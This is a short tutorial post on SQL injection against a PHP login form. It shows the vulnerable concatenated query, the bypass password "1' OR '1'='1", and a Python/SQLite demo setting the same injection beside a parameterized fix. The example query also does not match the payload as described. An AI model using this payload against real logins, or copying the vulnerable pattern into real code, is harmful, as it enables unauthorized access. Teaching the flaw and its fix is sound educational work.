Basic SQL Injection

This post demonstrates how SQL injection works against the login authentication used on some websites.

// The form values are dropped straight into the SQL string (the vulnerable pattern)
$user = $_POST["ulogin"];
$pass = $_POST["plogin"];
$sqlquery = mysql_query("SELECT * FROM login WHERE user='$user' AND pass='$pass'");
$rows = mysql_fetch_row($sqlquery);

So let's log in with a user called "hammer" (aptly named) and the password "123456"; the query becomes:

$sqlquery = mysql_query("SELECT * FROM login WHERE user='hammer' AND pass='123456'");

// No matching row means the credentials were wrong
if ($rows == 0) {
    die('Incorrect Login.');
}

Now let's inject.
Let's say we can see that the admin is called "admin" but we don't know his password. We enter "1' OR '1'='1" as the password, which changes the query to:

$sqlquery = mysql_query("SELECT * FROM login WHERE user='FeaR' AND pass='' OR '1'='1'");

As you can see, this trips up the database: the injected OR makes the whole condition true (the quotes still balance and '1'='1' always holds), so it will log you in, but only if addslashes() is off. Otherwise it won't work.
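To make the point concrete from the defender's side, here is an added example (not code from the original post) that rebuilds the login check in Python against an in-memory SQLite table standing in for the PHP/MySQL code above. It pastes the page's injected password into the query the same way the PHP does and shows, beside it, the parameterized version that treats the input as data; the table rows and the admin password are constructed sample values.

```python
import sqlite3

# Constructed sample rows standing in for the page's `login` table.
SAMPLE_ROWS = [("admin", "correct horse battery staple"), ("hammer", "123456")]


def make_db():
    """In-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_query(user, pw):
    """String concatenation exactly as the page's PHP does it."""
    return f"SELECT * FROM login WHERE user='{user}' AND pass='{pw}'"


def login_vulnerable(conn, user, pw):
    """True if the concatenated query matches any row (the page's check)."""
    return conn.execute(build_vulnerable_query(user, pw)).fetchone() is not None


def login_parameterized(conn, user, pw):
    """Same check with bound parameters: the input never becomes SQL text."""
    row = conn.execute(
        "SELECT * FROM login WHERE user=? AND pass=?", (user, pw)
    ).fetchone()
    return row is not None


# The password the page injects, verbatim.
INJECTED_PASS = "1' OR '1'='1"


def run_demo():
    """Run both checks with real credentials and with the injected password."""
    conn = make_db()
    return {
        "vuln_real_creds": login_vulnerable(conn, "hammer", "123456"),
        "vuln_injected": login_vulnerable(conn, "admin", INJECTED_PASS),
        "param_real_creds": login_parameterized(conn, "hammer", "123456"),
        "param_injected": login_parameterized(conn, "admin", INJECTED_PASS),
    }


if __name__ == "__main__":
    print(build_vulnerable_query("admin", INJECTED_PASS))
    for name, ok in run_demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

The concatenated query ends up as `... AND pass='1' OR '1'='1'`, which is true for every row, while the parameterized check rejects the same input because no row has that literal password.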
